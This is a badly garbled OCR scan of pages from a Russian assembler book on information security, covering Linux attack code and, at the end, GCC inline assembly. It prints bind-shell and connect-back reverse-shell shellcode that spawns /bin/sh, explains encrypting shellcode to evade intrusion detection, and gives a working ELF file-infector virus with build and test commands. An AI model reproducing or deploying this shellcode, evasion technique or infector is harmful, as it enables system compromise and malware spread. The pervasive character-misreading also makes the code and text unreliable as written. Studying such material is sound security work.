Ох804саю2 <5оскеЕ+18>:; моу1 %еах, $ерх й третий параметр - 0, поэтому обнуляем регистр %есх 
0х804с4Ъ4 <50скеф+20>; смр1 ЗОХЕЕЕЕЕЕВЗ, Зеах (передаем управление ядру 
Ох804саь7 <з;оске&+23>: )ае 0х804сас0 <_ зу5са11 етгог> ПОУБ $а1, %6} 
Ох804сара <зоске*+29>: ге поУь $ОхЗЁ, %а1 
Ох804саре <зоскех+30>: пор Хог 1 $есх, Фесх 
Ох804сарЕ <з0оскеф+31>: пор 116 $0х80 
ЕпЯ оЁ аззенЬ1ег апр. 

Бохх () 


(946) 915а5 р1па , [ничего особенного; просто передаем управл 
Рапр оЁЕ аззеть1ег сое Ёог Еапсё1о 


р: па: ие ядру, 





\ 





ООО 


№ 1 0 ^ 


290 Ассемблер в задачах защиты информа 
у - 
290 о иииииниииинни ии | ыы системе Мпих 291 
/[указав в регистре %еах номер системного вызова Ёогхк() | ета иииииииииия ля ее 
//вообще говоря, для облегчения кода эту функцию можно выбросить, | 1155еп (50С,1) , 
//но демон, в котором вызовется этот зВе11-соае, будет ждать // зомер подфункции 1155еп() == 4 
/ поУ1 $е$1, Зесх 


/окончания работы этой программы, что может выдать хакера 3 
поу] _%еах, (%$е51) 


хог| %еах,%еах д 
поь — $0х2,%а1 поУр ($0х1,%а1 
пе $0х80 поУ1 %еах, ОхА (%е51 } 
пор $0х66, %а1 
зоскее (2,1,0) поУр $0х4,3%Ь1 
//АЕ ТМЕТ, З0СК_ЗТВВАМ - определенные имена в заголовочных 10 $0х80 


айлах 5у$ зоскее, п так что можно по смотреть их и становит 
ф уз/ , д р У ь ассер* (50с,0,0)} 


уже определенные номера; / 
не стоит забывать, что п 
о > 
также необходимо отметить, что для вызова 515 _зоскегса11 /передается через Регистр ваЫХОду из функции выходной параметр. 
' нулять его не стоит; 
7’ 


й 

/1 ! 

араый Вы слета царе ан вначале его сохранить в том месте 
1 ' 
// 








данный вызов делится на несколько подвызовов, 
у каждого есть свой номер; | для. данного вызова где это положено 
при этом, когда нужно написать программу на ассемблере ЩО! 251, Зесх 
[Ив регистр $еах по-прежнему помещается номер вызываем- 7 поу]1 Феах, (3631 ) 
/ [функции (3У5_зоскесса11)с номером 0х6б6, а в регистр Ферх - | хог 1 9 Зеах Феах 
//номер подфункции; поу1 Феах, ОХД (Фез1 ) 
//все параметры, передаваемые в системный вызов, располагаются ОУ 1 Феах, 0х8 (%е31 ) 
//в памяти; указатель на эту область помещается в регистр $есх МОУЬ 50х66 за1 
//номера подфункций для этого системного вызова можно найти в МОЧЬ 60%5,%51 
файле /изг/1псти4е /11пщх/ пе". В 10 0х8 
//номер подфункции зоскеЕ () == 1 Использ 
По]  пезх Чвах | Ниже приведен код вызовов, можно создать готовую программу, как из конструкто- 
хог1  Ферх, %ерх , д программы, реализующей работу роп-зВе| кода 
ПоУ1 $ез1, %есх „тех | 
ВОУ1 %еах, 0х8 (3е51 } р .91ора1 зкахх 
моУр $0х1,%а1 , зсагс: 
воу:  %еах, 0х4 (%е51) //вызов функции Еохк() 
МОБ $0х2,%а1 хог1 Феах, %еах 
ПОУ1 Феах, (%е51 ) | по — $0х2,%а] 
ШоУр $0х66,%а1 у 1106. 0х80 
моУр $0х1,%51 . проверяем резул 
10 $0х80 . кезЕ1 к, и если он не равен нулю, уходим 
. | пе ех1е 1 
Ь: па (ос, (5 кЦСЕ зоскааат *) зегу аааг, 0х10) )пр Зо: -1 
//номер подфункции Ь1па() == 2 | рор1 чез: — 
//все точно также каки с вызовом зоскКее* () (!вызов Функции зоск 
//[при условии, что здесь происходит заполнение структуры, хог 1 вах рр ес (} 
//описывающей серверную часть программы хот] я еБх ЗеБх 
В о ПОУ1 $е5} , %е 
поу!:  %е51, зесх г зесх 
поу1 Феах, (%е51) моУр $0х2, зат. 
по $0х2,%а1 |  ПОЬ тоах, (3951) 
поми ах, Охс (%е31) от $0х1,%а1 | 
пор $0х77,%а1 ПО Зеах, 0х4 (%е51) 
поум ах, Охе (%е51) у я оу $0х6, $а1 
]еа1 Охс (%е51),Зеах ПО $еах, 0х8 (%е51 } 
по: Феах, ОХА (%е51) ко $066, %а] 
хог1 %еах,%еах Е $0х1,%51 
поу{1 %еах,0х10 (%е51) //вызо $0х80 = 
щоуЬ $0х10,%а]1 вов функции 1 п9(] 
по\1 = %еах, 0х8 (%е51) ПОТ зови, {2511 
поУЬ $0х66,%а1 Поз ох ‚за ; 
поУБ $0х2,%51 , пот оао (651) 
г 


11е $0х80 











ЩОУМ Зах, Охе (%е51 ) . 
1еа1 0хс (%$е51), $еах 
МОУ1 Феах, 0Х4 (%е51) 
хот 1 $еах, Зеах 

ПОУ1 %еах,0х10 (%е51) 
ЩОУР $0х10, %а1 

МОУ1 Феах,0к8 (%е51) 
МОБ $0х66, $а1 

|2: 0°) $0х2,%51 

106 $0х80 

}®р 0х4 

ех1 6 _1: 

)пр $ех1 Е 

901_1 


] пр 4018 


//вызов функции 11з5еп () 
бе 0°) $0х1, %а1 
моУ1 Феах, 0х4 (%е51) 
МОУр $0х66, %а1 
ей) $0х4, 31 
116 $0х80 

//вызов функций ассер* (} 
хог 1 $еах, %еах 
ПОУ1 %еах, 0х4 (%е51) 
воУ1 Феах, 0х8 (%е5: ) 
ПОУР $0х66, %а1 
и \е°) $0х5,%Ь1 
10 $0х80 


//вызов функций ацр2 (} 
этот код можно 6 


//вообще говоря, 

[1 

// поУБ %а1,%61 

// мочь  З0х3ЗЕ, $а1 

1 хог! чесх, $есх 

Г’ ев ы $0х80 

[1 

//  мМоУБ ОХЗЕ, %а1 

// поуБ $0%1,%С1 

[1 1 $0х80 

// 

// поУБ $0хЗЕ, %а1 

// моУБ $0х2,%с1 

[1 105 $0х80 

[1 

//но это увеличит размер кода, да и 

//алгоритмически не очень красиво 
вОУЬ $3,%С1 
ЩОУБ $а1,%Ь1 
1оор_1: 
поУБ $0х3#,%а1 
106 $0х80 
1оорп2 $1оор_1 

//вызов функции ехесуе () 


//смотри аауапсеа ехесте () 
хог| Феах,%еах 
ризВ] Феах 
ризв1 $0х68732Е6е 
ризв1 $0х69622Е2 Е 
поу! %езр, Зебх 


ыло бы заменить на следующий: 
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Э ао во р оо ооо номов оон асс ооавовивов Нарнии ина в ии и ии и ноев у оч ния ооо оон оооонев 
. ев и 


с1%а 

рузВ1 %едх 

разв] %ерх 

поу] Зезр, $есх 
й поУр $0хЬ, $а1 

115 $0х80 

ех1 с: 


//вызов функции выхода 


ХОх ] Феах, %еах 
пор  $0х1,%а1 
ОЕ] Зерх, Зерх 
10 $0х80 


посл й 
ей команды са]11 в сегмент кода будет 
т 
ава ура, описывающая серверную часть 
01%: 


са! 1 9141% 


В качестве дополнения 
ействия и в общем ая вал приведена программа, описывающая несколько другие 
гда подсоединяются к серверу АМП ы предыдущей. Дело в том что хакеры не все- 
дать сервер подключаться к хаке ‚ Порой, из-за настроек НгеуаЙ приходится вынуж- 
программы, при запуске ру. Для этого используются ФасК-соппесе зпе!|-кодь 
которых подсоединяются к определенному серверу на предо 


ленный порт и открывают оболочку 
В этом с. 
лучае сам сервер становится клиентом, а хакер — сервером 





„Сехс 

.91ора1 зкаге 

$сагс: 

шоу] Зезр, ЗеБр 

хог] Зеах, %еах 

ПоУР $102, %еах 

оу] Федх, $еах 

хог] Фесх, %есх 

поу]1 Фесх, Зерх 

310с1 Зерх 

поу1 зерх, -8(% 

11с1 Зерх (ФеБР) 
оу] %ерх, - $ 
ес! Ферх. 12 (еЪр) 
ОУ! Зесх, -4 (%еЪр)} 
1еа1 -12(%е5 ее 
ле. к ес 
Хот $есх, %$есх 

поу] Зеах, -12 

3пс1 %ерх (Вер) 
поум Зерх,-20 (%еЪ 

Поум 5990 1 Зеро 

поУ1 $0х100007Е, -16 (зеьр) 
еа1 -20 ($ерр) , $еах 

оу] Феах, -8 ($еЪр) 

Поур $16, -4 (%еБр) 

поу] Зеах, Зеах 

31с1 %ерх 

1еа 





1 -12 (%еЪр)} , %Зесх 
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ШОУИ Фах, Охе (%е51 ) 
1еа1 Охс ($е51) , Зеах 
оу] $еах, ОХА (%е3: } 
Ххог 1 $еах, %еах 
МОУ! Феах, 0х10 (%е51 ) 
ет °) $0х10,%а1 
оу] Феах, 0к8 (%е51 ) 
МОУ $0х66, %а1 
МОУ $0х2,3%Ь1 
106 $0х80 
пр 0х4 
ех1{ 1 
пр $ех1 Е 
901% _1 
пр 01 

//вызов функции 115%еп() 
ШОУ $0х1,%а1 
МОУ1 $еах, ОХА (%е51 ) 
поУр $0х66, %а1 
моУр $0х4,%1 
116 $0х80 


//вызов функции 


ХОЕ 1 
ОУ] 
оу] 
ЩОУБ 
моУр 
1пе 


МОУ 
моУур 
ХОгЕ1 
105 


МОУ 
116 


ПОУБ 
моУр 


/ 

/ 

/ 

/ 

/ 

/ 

/ 

/ 

/  моУЬ 
/ 

/ 

/ 

/ 

/ 

/ 106 
/ 

/ 

/ 


эт 


моур 
МОУ 


ассер® () 
Ф$еах, Зеах 
$еах, 0х4 (%е3$1.) 
Ф$еах, 0х8 (%е51 ) 
$0х66, %а1 
$0х5,%51 

$0х%80 


вызов функций апр2 () 
вообще говоря, 


$а1,%1 
ЗОхЗЕ, $а1 
$есх, $есх 
$0х%80 


ЗОхЗЕ, %а1 


о это увеличит размер кода, 
лгоритмически не очень красиво 


$3, %С1 
$а1,%Ь1 


1оор 1: 


поУЬ — 
116 
1Тоорп2 


$ОхЗЕ, $а1 
$0х80 
$1оор_1 


//вызов функции ехесуе (} 
//смотри адуапсеЯ ехесуе () 
Ф$еах, %еах 

$еах 

$0х68732Е6е 
$0х69622Е2Е 
Зезр, зерх 


хог1 
разн} 
рузв1 
ра5В1 
ПОУ1 
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гда 





и 


разв] Феах 
ризв1 %ерх 
воУ:  Фезр,%есх 
поур $0хЬ,%а1 


116 $0х80 
ех1*: 

[вызов функции выхода 
хо 1 Феах, %еах 


ЩОБ $0х1, %а1 

хог 1 Ферх, $ерх 

108 $0х80 
//после ниже идущей команды са]] в сегмент кода будет 
/[записываться структура, описывающая серверную часть 
//программы 

Чо1%: 

са! 1 91914 


В качестве дополнения ниже приведена программа, описывающая несколько други 


действия и в общем схожая по алгоритму с предыдущей. Дело в том что хакеры не все 


подсоединяются к серверу сами. Порой, из-за настроек ЯгеууаЙ приходится вынуж 


дать сервер подключаться к хакеру. Для этого используются БасК-соппесе зВе|-кодь 


программы, при запуске которых подсоединяются к определенному серверу на опреде 
ленный порт и открывают оболочку. 


этот код можно было бы заменить на следующий: 





даи 





В этом случае сам сервер становится клиентом, а хакер — сервером. 


„сехе 

91оБа1 этаг® 
саге: 

по\у1 Фезр, %Зерр 

хог] Федх, %е4ах 
поур $102, %еах 

поу] Зе9х, %еах 

хог] %есх, %есх 
оу! $есх, $ерх 

1пс1 %ерх 

шоу Зерх, -8 (3еЪр) 
1пс1 %ерх 

поу1 Зерх, -12(%ерр) 


ес] $ерх 
поу] %есх, -4(%еър) 
]1еа1 -12(%ер) ‚%есх 
11$ 50х80 


хог] %есх, %есх 
ПоУ] %еах,-12 (%еЬр) 
31с1 %ерх 





МОУ текь 20 (365) 
поум $9999, -18 (%еЪр) 
поу] бб о ЗеБр) 
1еа] -20($еЪр),З%еах 


поу] Зеах,-8 (%еЪр) 
поур 516, -4 (ЗеБр) 
по\у] Фе4х, %еах 

1101 %ерх 

1еа1 -12(%еЪр) , %есх 
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106 $0х80 
хог] %есх, %есх 
1оор: 
ПОУБ $63, $еах 
о февы $0х80 
11с]1 $есх 
сир] $3, зесх 
) пе $1оор 
хог] Феах, Зеах 


ри5Н] %еах 

рузВ1 $0х68732Ебе 
рузв] $0х69622Е2Е 
поу %езр,%еЬх 
с1 а 

рузВ] %еах 

рузВ1 %еБх 


поу]  Фезр, %есх и 
воУЬ $50хЬ,%$а]1 
106 $0х80 


4.11. Защита от гетое ехрой 


К сожалению, как таковой защиты не существует. Самый действенный метол 
анализ передаваемых по сети пакетов. | 

Существует технология 0$ (шелзюп Раесцоп бумет), эти системы в зависимости 
передаваемого по сети трафика позволяют пройти пакетам к программам-клиентам или - 
вызывают Ягеууа|, который в свою очередь блокирует вредоносный, по мнению 0$, трафи 

Как же П$ определяют, что работает ехр!ой. 

Дело в том что в большинстве з5фе|-кодов открытым текстом написано имя вызыв. 
мой программы. Да и код многих из них похож. Поэтому 10$ начинает действовать, 1. 
антивирус: сканирует приходящий трафик, проводя поиск известных ей сигнатур атак. 

Хакеры, следящие за развитием компьютерной индустрии, придумали множество мето. 
обхода таких 10$. Можно заметить сходство борьбы между хакерами с 0$ и вирусописе ` 
лей с антивирусными пакетами. Хакеры начинают перенимать криптографические техно 
гии, методы внесения неопределенности в работу РПВ, используя их в своих звей-колах. 

Зашифровать сам текст зВе|-кода достаточно просто, стоит только помнить, ' 
в его теле не должны встречаться нулевые символы, иначе код просто не будет ра’ 
тать. Также следует помнить о том, что, возможно, сама программа не позволит п 
нимать в виде входного параметра символ "/". Возможно ограничение на ввод ком 
нации символов ‘5Н’. Все эти ограничения обходятся без проблем. 

Рассмотрим пример использования шифровщика. Текст написан для синтаксиса И 
так как может быть применен для шифрования 5ре!-кода не только под Ошх-систе 
но и под \! дом. у 
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„ооиоовновиронания нано оонвоее ивнни ... оон ино несов восвьсонь 
Борн нин вии и ии и ии наююиначннов 

чозежниню .. . 

, . порановоавотонииичии, 


па1п_Ческ1 ре: 


рор е51 
1Тоор_Чесг: 
дес Русе [ез1+есх] 


Тоор 1оор Зесг 
дес Бусе ]ез:] 
разн е51 


ге 

епсоаеа: 

са1 1 па1п Чесгуре 

аь ТМСЬОРЕ ЕМСОРЕР ЗНЕВЬСОВЕ 


//:МСЬОРЕ_ЕМСОБЕО ЗНЕБЬСОВЕ - это бинарные 
_ _ данны 
// зашифрованные по алгоритму обратному расшифьовее 


4.12. Е Е-инфекторы 


Так как сама операционная система написана на языке С, то и вирусов написанных на 
других языках достаточно мало. Вирусов под ГАпих вообще мало. Эта операционная сис- 
тема имеет грамотную систему разграничения прав доступа, что в значительной степени 
предотвращает вирусную активность. Для того чтобы заразить всю систему, вирусу не- 
обходимо иметь как минимум привилегии гооё а для этого нужно эксплуатировать 
какую-нибудь серьезную ошибку в системе. 

В мире хакеров Г/ах-систем, как таковых, нет вирусописателей. Обычно хакеры пишут 
Е№-инфекторы (п{есог) в надежде на лучшие времена, пока не будет найдена уязвимость 
присущая множеству Глаих-систем. 

Большинство исполняемых файлов в пах, называются Е! (ЕхесщаЫе ап 1лиЮпо 
Роппа). Отсюда и название паразитов — ЕЕ паразиты. ^ 

Такие паразиты не имеют каких-либо особых функций, а в основном применяют ка- 
кую-то специфическую технологию заражения. За исключением особых случаев, когда 
необходимо инфицировать определенный процесс, причем так, чтобы исполнялись 
какие-то определенные действия: открытие оболочки удаленному пользователю запрет 
на проверку Ш пользователя, чтение из какого-то файла ит. п. | 
а УЖ говорилось ранее, таких паразитов обычно пишут на языке С, но при исполь- 
ры ра код получается более компактный. Плюс ко всему ассемблер позво- 
о программировать так, что при дизассемблировании программы достаточно трудно 
а о отр мист имел в виду. Такое программирование превосходно подходит 

руса от эвристического анализатора. 
етодов заражения существует несколько: от банального добавления тела вируса 
оне фаны © заголовком) и дописыванием тела инфицированной программы 
мы дор ения тела вируса на куски и внедрение каждого в неиспользуемое 
ду секциями. 


е .. 
ры Дело в том что сам файл ЕГЕ формата состоит из нескольких секций, каждая из кото- 
Хх имеет свои флаги и тип: 


В нач 
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са11 Еореп . 
. ОУ] Феах, спрпапа!е 
№ содержит данные; //получаем старую точку: входа в программу 
Ш не содержит данных; рор1 зерх 
. поУ1 $0х18, %есх 
№ разрешена запись в секцию; хог1 $Федх, %е4х 
е секции: | са]11 Езеек 
и разрешено выполнени ции, /[читаем ее в переменную 
Ш разрешено динамическое выделение памяти. 071 бадагезз, %есх 
: ется заголовок про ОУ] $0х4, Зеах 
Существует следующая возможность заражения: модифициру Грам. са1 1 Етеаа 
мы-жертвы таким образом, чтобы секция данных имела разрешение на исполнение. Эт, /[получ зем старое ‚смещение секции заголовков 
- 0У1 есх 
конечно, при условии, что до этого секция такого разрешения не имела. Далее, если Хватает хог1 Федх, Зе4х 
анных помещается код вируса и меняется точка входа программы именно са! 1 Е зеек 
места, в секцию п После того как вирус выполнил свои дейст. //записываем его в переменную 
на начало секции данных программы-жертвы. :10сл . еняе ЩОУ1 $01 ро1пе, Зесх 
н передает управление программе-носителю. Так как размер файла не меняется, то поу1 $0х4, Зеах 
вия, он пер .. ооруженным глазом практически невозможно. са! 1 Егеа9 
определить, что файл заражен, невооруж ам Если он нахо /[получаем размер секции заголовков 
Защита от такого метода — проверка адреса точки входа в программу. нию. дол ` поч] $0х2е, , есх 
и, в которой, по определ , ЖНЫ хХог еах, зеах 
дится в промежутке адресов отведенных для ре рои, са1 1 Е зеех 
одозрение на . //[записываем в переменную 
находиться данные, то возникает п м и ь у 
Иногда вирусы записывают свое тело в конец (последнюю секцию файла) файла поу1 Зопетуз1 те, $есх 
ЩОУ1 х еах 
жертвы после чего меняет точку входа в программу. Далее, как обычно, после работы са1 1 т теа4 
, . 
вируса управление передается на программу-жертву. , ГИвычисляем, новую а ен раженную программу 
у 
Ниже приведен пример программы ЕЁР-инфектора. по] $0х2, %еах 
са] 1 . Егеаа . 
. ака , . и рузН]1 Ферх 
У1СС1 м: . 561119 Е СЕ" хог] %еах, Феах 
тези1 Е: .зет1па ". /1 песку хог 1 Ферх, Зерх 
пемзво ЕЁ: ПОУМ зум1паех, %Ьх 
еп гуз17е: ПОМ еп гуз17е, зах 
пемепску: , пи! 1 Ферх 
.10оп9 0 , б я ааа] о1Чаро1пЕ, %еах 
с првапа]е: .]оп9 0 ` : оу 1 %еах, о1Чро1 пе 
зупероз: 1 опа 0 й а491 $0х10, о]1аро1пЕ 
зум: паех:. Е рор1 Ферх 
о] Чро1пе: „1019 НН 1 п" . МОУ1 о\Чро1пЕ, %есх 
пеззаде: , 557119 е.. а хог 1 $еах, %еах 
рыЕтег: Буте ь са1 1 Езеех 
‚91ора1 _ Е ПО] о] Чро1пЕ, Феах 
Готовые исходный файл на чтение - это наша жертва РЁ я неа, Ре 
7 увосте открытия результат помещается в Феах ьВ т фо аро ль, есх 
// сохраняем его в стеке ерх са11 Етеаа 
поУ1 сх /[готовим вторую часть для записи 
пОУ1 } р ах хог]1 ‚ Зесх, %есх 
и т рее | 
к са зее . 
581 Феах нный 06%8 } р 
открываем файл - результат; в него помещается зараже НЫ ВОС И таро, $еах 
//используемые флаги для открытия О_ВОИВ | 0_СВ _ и копиры вайл еах 
сохраняем дескриптор в переменной | 
[сохр ям бтезите, ФеБх Я. хог1 %е4х, Феах // ЗЕЕК_ЗЕТ 
МОУ1 $01102, Зесх 


ШОУ] $00700, %еах 





или оно 
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хог 1 $есх, %есх // точка входа хог] Зе4ах, Феах 
ПоУ1 $0х13, %еах // поиск в файле са11 Езеек 
10 $0х80 а4а1 $0х08048000, о1Яро1пЕ 
спр1 ЗОХЕЕЕЕЕОО1, %еах ПОУ1 $о1аро1пЕ, %есх 
)ае еггот 1 | ПОУ1 $0х4, Зеах 
МОУ] о]14ро1пЕ, %есх са11 . мгу хе 
]1оорег: ааа] $ (Бодуела-Бодузкаг*), зущероз 

-рузв1 $есх поу1 зущероз, Фесх 
МОУ! $рирЕег, %есх хог1 $еах, %еах 
ПОХ 1 $0х1, %еах са] 1 Езеек 
са] 1 Егеаа й а4а1 $ (родуепа-Родузкаг®)}, о1аро1 пе 
ризв1 Ферх $01 $0%х08048000, о] 9ро1пЕ 
ПОУ1 Е прнапа1е, $ерх . поУ] $01Чро1пе, %есх 
пОУ1 ЗрцЕЕек, %есх у моУ1 $0х4, %еах 
ОУ] $0х1, зеах са! 1 Еигухе 
са11 Еигтсе //закрываем файлы 
рор]1 Ферх с1о5е: , 
рор1 $есх са1 1 Ес] озе 
1оор ]1оорег зар пе 

//запись тела от начала к концу еггох 1 : 
разн] $ерх хог ] $ерх, херх 
ПОУ1 Е прнапа]е, %ерх поу] $теззаде, %есх 
ЩОУ! $родузсате, %есх поУ 1 $0х5, %еах 
ПО] $ (родуепа-Бодузхат®), %еах са11 Емга се 
са11 Ему ке . пе: 
рор! Зерх хог1 Зерх, Зерх [/ зЕасме 

/ {добавляем поУ1 $0х1, Зеах 
рор1 Зесх 10 $0х80 

]1оорега: БодузтатЕ: 

ру5В] ‘° %есх са11 дее_1р 
ПоУ]1 $риЕЁегк, %есх дее_1р: 
поУ1 $0х1, Зеах . рор1 Ферр 
са1 1 Егеа4 Я $91 $0х5, ЗеЬр 
ру$61 Ферх | му] $0ха, Зеах 
ПОУ 1 с првапа1е, Ферх ПОУ1 $ (5Веге-родузфате), Фесх 
пох] СЬиЕЁег, %есх а4а1 ЪЗеьр, %есх 
пОУ1 $0х1, %еах хог1 Ферх, %ерх 
са! 1 Еига се ПоУ1 $0х4, Зеах 
рор\1 Зерх 10 $0х80 
рор! $есх МОУ1 $ (аа4гез=-Родузкахк®), ЗеБх 
1оор ]1оорег2 ааа Ферр, зерх : 
са1 1 Ес1озе моУ1 $ерх), Зеах 

//ставим новое смещение секции таблицы заголовков са11 *Зеах 
ПОУ1 с пррапа1е, Ферх а44гезз: 
ЩО] $0х20, Зесх .1ол9 0 
ХОЕ] $е4х, %еах знеге; 
са! 1 Е5ееХ „ЗЕ к1па "Т'м Беге!\п" 
ЩОУ1 . ЗпемзвоЕЕ, %есх роауепа: 
поУ1 $0х4, %еах у еггог: 
са11 ЕтеаЯ спр1 ЗОХЕЕЕЕЕОО1, %еах 
а9а1 $ (Бодуепа-Бодузфат®), пемзВоЕЕ )ае еггог1 
поу1 $0х20, Зесх ге 
ХОг1 Фех, Зеах 
са1 1 Е5еек Егеаа: 
МОУ! ЗпеизвоЕЕ, Фесх поу1 $0х03, Зеах 
поУ1 $0х4, Зедх . тпе $080 
са! 1 иг: ке са1 1 етгог 

//новая точка входа 
ПОУ1 $0х18, Зесх 
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гее 
иг бе: 
МОУ 1 $0х04, %еах 
116 $0х80 
са11 еггог 
ге 
Еореп: 
ПОУ1 $0х05, %еах 
11 $0х80 
са11 еггог 
ге 
Ес10о5е: 
ЩОУ 1 $0х06, %еах 
1 пе $0х80 
са! 1 еггог 
гее 
Езеек: 
МОУ] $0х13, %еах 
11 $0х80 
са11 еггог 
гее 


Код программы, на которой это все можно протестировать (\1с#т.з): 


„.91ора1 _зеаге 


_зЕаге: 
МОУ 1 Зепаз&г1п9, %еах 
ПОУ1 $пеззаче, %есх 
хог1 $ерх, %ефх 
оу $0х4, %еах 
11 $0х80 
ЩОУ 1 $0х1, Зеах 
Хог[ $ерх, %еъх 
пе $0х80 
меззаде: 
-ЗЕг1149 "ОВ, по! МКу ме?! \п" 
епазЕг1п9=. -пеззаде 
Компиляция: 
$ аз -3 у1сЕ1м.5 -0 11.0 
$ 1а -3 ч1се1щм.о -о м1 
$ аз -$ у1г.5 -0 УГ 
$ 14 -$ \м1кг.о -о мг 
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Запуск программы (на экране появится следующее): 


$ ./М1СЕ1м 
Оп, по! ИВу пе?! 
$ „/1пЕесеог 
$ ./1пЕесеу1 сем 
1'ш Веге! 
ОП, по! МВу ме?! 
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ава, ие озтвоввооовововввниь зори ннаненя оон неона ние вом ко ово ваянаниюа  звения нано ввьеон вена оп в вв ооовивонааавосваннь, 


113. Использование @пе-ассемблерных вставок 


При использовании шИпе ассемблера при написании программ под Отх-системы 

ачивается возможность легкого портирования приложений на другие архитектуры, 
к как в этом случае нужны знания ассемблера используемых процессоров. Однако ино- 
пла появляется необходимость в использовании одновременно двух языков для написа- 
ния программ - С и Ассемблера. Для таких случаев компилятор ССС поддерживает 
встраиваемые ассемблерные инструкции. Существует несколько вариантов (с использо- 
званием дополнительных параметров и без): 


я использование инструкций т!пе ассемблера в теле программы, 
я использование инструкций ассемблера в качестве параметров к функции азт\(). 


В последнем случае не нужно никаких специфических знаний шИпе-ассемблера, так 
как в качестве параметра используется обычный текст программы (здесь имеется в виду, 
что используется только первый параметр к функции, оставшиеся, необходимые уже как 
увпе-ассемблер, не используются). 

Мы уже использовали такой вариант ассемблера, когда нам нужно было получите 
указатель вершины стека для написания ехр|оН: 


ее _5р (у01а} 
{ 
__азм__("мо\1 %езр, %еах"); 
} 
В данном примере мы использовали только первый параметр к функции азт(). В слу 
чае нескольких параметров последние разделяются дзоеточием: 


аз ( аззень]1ех +епр1а*хе 

:оцЕриЕ орегап@з (орЕ1опа1)} 

:1пруе орегап@$ (ор&!опа1} 

:11$56 оЁ с} оффеге4 гед1з®егз (орё1опа1) 
}; с 


Здесь в качестве первого параметра — ассемблерные инструкции, второй — выходны 
операнды, третий — входные операнды, четвертый — те регистры, которые могут быт 
изменены в поле аззетЫет {етр!ае и не должны быть изменены компилятором. 


В качестве параметров со второго по четвертый необходимо использовать следук 
Щую таблицу: 


В (ЕАХ, ЕВХ, ЕСХ, ЕЩОХ, ЕЗ, ЕГЛ, ЕВР, ЕЗР) 
9 (ЕАХ, ЕВХ, ЕСХ, ЕОХ) 
Е ЕюоаНп?-рони 
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я езнииениитиизинииниинониннииивепнопниютпоеввнвивевиветвирвзернеь реииоенние нь РОРМац 


Тор Йоайпэ-ропе 

Зесопд-Яот-юр Йоайпе-роше 

ЕАХ 

ЕВХ 

ЕСХ 

ЕОХ 

З5Е гез1$ ет (Зтеапите ПМР Ежепюп ) 
ММХ шшите а 

Ап 8-Буе уаше Ююгте4 бот ЕАХ апд ЕЮХ 
ЕП 

Е 


фор ососряеяЯя 


Самый простой пример шИпе-ассемблера: 


{ 
116 а=10,5; 
ази (“по\у] %1, %%еах; 
оу %%еах, %0;*" 


1" =г” (Ъ} // выходной параметр 
:" г” (а) // входной параметр 
:"Зеах” // регистр (см. ниже} 


}; 
} 


В этом примере мы приравниваем переменную Ъ к переменной а, используя встр.. 
ваемый ассемблер. Здесь Бр — выходной операнд, описанный номером регистра %0, :. 
входной операнд, описанный номером регистра %1, г — принудительная конструкция. 
заставляющая 2сс считать, что переменные а и Ъ должны храниться в регистрах, = перед 
использованием такой конструкции говорит о том, что это выходной параметр и он тад- 
же должен храниться в регистре. 

Чтобы отличить передаваемые входящие/выходящие операнды (описываются как % 
и номер операнда) от регистра %еах, последний должен выглядеть как %%еах. 

Указывая в качестве четвертого параметра в функции азт регистр %еах, мы говорим 
компилятору ССС, что данный регистр уже используется в секции аззет ег 1етр!а® 
и не стоит его модифицировать при компиляции. ` 


№оу] %1, %%еах помещает переменную а в регистр %еах. 
поУ1 %%еах, %0 помещает значение из %еах В переменную ь. 


После того, как азт будет выполнена, в переменной Ъ будет находиться новое значе" 
ние, так как эта переменная была указана в качестве выходного параметра. Иначе говоря» 


все изменения переменных внутри азт сохраняются и после исполнения функции. 
Подробнее о полях азт. 


ава... 
дззетЫег 1етр!ате. В этом поле находится ассемблерная функция или набор функ- 
ни, которые следует использовать в программе на языке С. Этот набор инструкций 
ючается в двойные кавычки, при этом инструкции должны быть отделены друг от 
ри В качестве разделителя можно использовать как точку с запятой, так и символ 
р Ра строки (\п). Стоит заметить, что при компиляции можно создавать ассемблерный 
айл, удобство чтения которого можно повысить, используя знаки табуляции. В этом 
лучае следует использовать их до знаков начала новой строки. Инструкции, обрашаю- 
 уиеся к переменным, описанным в С-программе, должны использовать обозначения 
таких переменных, как было описано ранее: %0, %1... 

Компилятор иногда пытается оптимизировать передаваемый ему код. Для того чтобы это- 
го не происходило, нужно использовать выражение "уо]аШе". Если компилятор стандарта 
АМЗТ С, то перед и после использования выражений "азт" и "уо]аше" следует использовать 
двойное подчеркивание: _азт__ __уо!аШе 

Операнды. Главная особенность шПпе-ассемблера — это возможность использования 
операндов, описанных еше в С программе. Всего передаваемых операндов может быть 
не больше 10. Каждый из них нумеруется, начиная с 0, при этом не выделяется, какие 
операнды входные, какие выходные. В секции, описывающей операнды, может нахо- 
диться несколько операндов, каждый из которых должен быть обязательно отделен 
от других запятой. 

Работа с памятью. В рассмотренных примерах для хранения операндов в регистрах 
использовался описатель г. Для того чтобы хранить данные в памяти, используется опи- 
сатель т: 





азм (“514 %0\п” “м” (10сС}}; 


Использование памяти для хранения операндов в шпе-ассемблере используется ред- 
ко. Скорее, для того, чтобы не использовать регистры, что порой достаточно важно при 
написании ехрю!-программ. 

Совпадение. Сразу рассмотрим пример: 


азм (“1пс1 %0” : “=а” (таг): “0” (уаг}); 


В данном случае используется пока не известный нам описатель "0". Причем его пра- 
вильнее назвать не описателем, а "принудителем". В качестве первого операнда исполь- 
Зуется выходная переменная уаг. Ее порядковый номер %0. В качестве входной пере- 
менной используется та же переменная, указав "принудителем" "0", мы заставляем ССС 
использовать в качестве хранящего регистра тот регистр %еах, что и для выходного опе- 
ранда, что позволяет сэкономить используемые ресурсы и увеличить быстродействие 
(в архитектуре 1АЗ86 все операции с регистром еах осуществляются быстрее, нежели 
< другими регистрами). 
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Примеры использования шпе-ассемблера. Если вы уверены в том, что ваша про. 
грамма не будет в будущем перенесена на другие платформы, то смело можете исполь. 
зовать нижеследующие примеры. 

Пример обмена значениями двух переменных: 


014 па!п()} 
{ 
11Е х=10,у; 
азп( “поу1 %1, %%еах\п 
оу] %%еах, %0* 
"=" (У} 
"т" {х) 
“%еах” 
); 
} 














Код, генерируемый ССС при компиляции: 
па: т: 
ризВ] $ебр 


МОУ] $езр, ЗеЪр 
301 $8, зезр 


101 —$10,-4 ($ерр} // у=10 

ПОУ] -4(%еър),%е4х // получаем передаваемое значение в %е4х 
4АРР // начало азм 

МОУ 1 ФеЧх, %еах // х передаем в %еах 

МОУ] Феах, %еах /Г у - новое значение в %еах 

#+№0_АРР // конец азм 

МОУ 1 Зеах, -8 (%ерр} // новое значение помещается в стек 


